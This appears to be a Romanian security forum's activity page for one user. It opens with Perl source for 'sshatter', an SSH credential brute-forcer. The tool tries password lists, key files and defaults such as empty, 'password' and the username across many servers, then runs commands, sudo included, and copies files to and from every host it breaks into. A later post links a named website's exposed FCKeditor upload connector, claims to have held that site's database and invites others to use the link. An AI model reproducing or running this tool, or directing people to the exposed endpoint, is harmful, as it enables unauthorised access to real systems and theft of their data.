Parallel::ForkManager->new($maximumprocess); $forkmanager->run_on_finish(sub { my $processid; my $returncode; my $targetserver; my $readhandle; my $readdata; my $credentialtype; my $username; my $credentialstring; $processid = shift; $returncode = shift; $targetserver = shift; $targetserver->unpipe(); $readhandle = $targetserver->readhandle(); while ($readdata = <$readhandle>) { $readdata =~ s/\x0a//g; ($credentialtype, $username, $credentialstring) = split(/ /, $readdata); if ($credentialtype eq "K") { $targetserver->addkey($username, $credentialstring); } else { $targetserver->addpassword($username, $credentialstring); } } close($readhandle); print STDERR "I: " . $targetserver->info() . " finished\n"; }); open($targetserverhandle, "<" . $targetserverfilename); while ($targetserverstring = <$targetserverhandle>) { ($hostname, $portnumber) = parsetarget($targetserverstring); $targetserver = SSHatter::SSH::Host->new($hostname, $portnumber); print STDERR "I: " . $targetserver->info() . "\n"; push(@targetservers, $targetserver); $targetserver->pipe(); $processid = $forkmanager->start($targetserver) and next; $writehandle = $targetserver->writehandle(); open($usernamehandle, "<" . $usernamefilename); while ($usernamestring = <$usernamehandle>) { $usernamestring =~ s/\x0a//g; if (defined($keydirectoryname)) { while ($keyfilename = <$keydirectoryname/*>) { if ($targetserver->checkbykey($usernamestring, $keyfilename) == 1) { print $writehandle "K" . " " . $usernamestring . " " . $keyfilename . "\n"; } } } if (defined($passwordfilename)) { open($passwordhandle, "<" . $passwordfilename); while ($passwordstring = <$passwordhandle>) { $passwordstring =~ s/\x0a//g; if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) { print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . "\n"; } } close($passwordhandle); } if (defined($dumbflag)) { foreach $passwordstring (("", "password", $usernamestring)) { if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) { print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . "\n"; } } } } close($usernamehandle); $forkmanager->finish(); } close($targetserverhandle); $forkmanager->wait_all_children(); foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { print $username . ":" . $targetserver->key($username) . "@" . $targetserver->info() . "\n"; } foreach $username ($targetserver->usernamesbypassword()) { print $username . ":" . $targetserver->password($username) . "@" . $targetserver->info() . "\n"; } } if ((defined($masscommand) || defined($interactiveflag)) && defined($safeflag)) { print "W: executing " . (defined($masscommand) ? $masscommand : "in interactive mode") . ", continue? [y/N] "; $confirmresponse = <>; if ($confirmresponse !~ /^[Yy]/) { exit(1); } } if (defined($masscommand)) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, $masscommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, $sudoflag, $masscommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } else { if (defined($interactiveflag)) { print "\$ "; while ($nextcommand = <>) { $nextcommand =~ s/\x0a//g; if ($nextcommand eq "exit") { last; } else { if ($nextcommand =~ /put (.*)/) { open($localfilehandle, "<" . $1); binmode($localfilehandle); while (read($localfilehandle, $localfilebyte, 1) != 0) { $localfiledata .= sprintf("\\x%02x", ord($localfilebyte)); } close($localfilehandle); foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($1)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($1)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } else { if ($nextcommand =~ /get (.*)/) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "cat " . $1); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($1)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "cat " . $1); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($1)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } } } else { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, $nextcommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, $sudoflag, $nextcommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } } } print "\$ "; } } else { if (defined($localfilename)) { open($localfilehandle, "<" . $localfilename); binmode($localfilehandle); while (read($localfilehandle, $localfilebyte, 1) != 0) { $localfiledata .= sprintf("\\x%02x", ord($localfilebyte)); } close($localfilehandle); foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($localfilename)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($localfilename)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } else { if (defined($remotefilename)) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "cat " . $remotefilename); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($remotefilename)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "cat " . $remotefilename); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($remotefilename)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } } } } } } exit(1); sshatter
  12. adi003user
    e nasoala poza aia mare cat casa. shrink'it
  13. adi003user
    Mantra is a dream that came true. It is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers, security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software. Mantra is a security framework which can be very helpful in performing all the five phases of attacks including reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access, and covering tracks. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensive security related tasks. Mantra is lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes.Mantra is absolutely free of cost and takes no time for you to set up. Download
      • 1
      • Upvote
  14. adi003user
    esti penibil. pleaca
  15. adi003user
    La multi ani! sper ca e ziua ta. sa nu iti urez asa degeaba
  16. adi003user
    Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose sole purpose is to securely host a Tor server purely in RAM. For those not familiar with Tor, it is a system which allows the user to construct encrypted virtual tunnels which are randomly relayed between Tor servers (nodes) until the connection finally exits to its destination on the internet. The encryption and random relaying resist traffic analysis in that a malicious sniffer cannot easily discover where the traffic is coming from or what data it contains. While not perfect in its efforts to provide users with anonymity, Tor does help protect against unscrupulous companies, individuals or agencies from "watching us". For more information, see the Tor official site. The usefulness of a RAM only environment for Tor became apparent to me when Janssen was arrested by the German police towards the end of July, 2007. (You can read the full story in a CNET article.) While the police did not seize the computer for whatever reasons, they certainly could have. More typically, it would have been taken for forensic analysis of the data on the drives. Of course, if the computer housing the Tor server has no drives, there can be no question that it is purely a network relaying device and that one should look elsewhere for the "goods". Other advantages became clear: It is useful to operators that want all traces of the server to disappear on powerdown. This includes the private SSL keys which can be housed externally. The environment can be hardened in a manner specific to the limited needs of Tor. It has the usual speed advantages of diskless systems and can run on older hardware. The only known disadvantage is that it cannot host Tor hidden services which would require other services (e.g. http), and their resources (e.g. hard drive space), in addition to the Tor server itself. However, as a middle or exit node, it is ideal. Downloads PS. made my day
  17. adi003user

    Deezer

    adi003user replied to a topic in Off-topic

    Grooveshark - Listen to Free Music Online - Internet Radio - Free MP3 Streaming
  18. adi003user
    foloseste php-fusion. comunitate romaneasca puternica iar Nicu (admin) e foarte priceput si o sa te ajute.
  19. adi003user
    simplu: php-fusion. complex: joomla parerea mea: propriul cms. why? secure
  20. adi003user

    7n.ro

    adi003user replied to culay's topic in Off-topic

    LE: aveam baza lor de date. sa ma uit daca o mai am. LE2. http://7n.ro/fckeditor/editor/filemanager/connectors/test.html go happy good luck
  21. adi003user
    o sa hostati rstcenter.com acolo ca sa va mearga bine? oricum... numai bine si sincer sunt curios de feedback.
  22. adi003user
    Debian. Motiv: Ubuntu e de fetite
  23. adi003user
    good luck. au net acolo?
  24. adi003user
    cam shiny aplicatia aia pentru un tool de dos serios... GUI cu pamantul in rotatie? Mi-am adus aminte de swordfish cand avea ala 3 monitoare
  25. adi003user
    ce model de placa de retea e cea de la intel? ce marca/model e switch-ul?
×
×
  • Create New...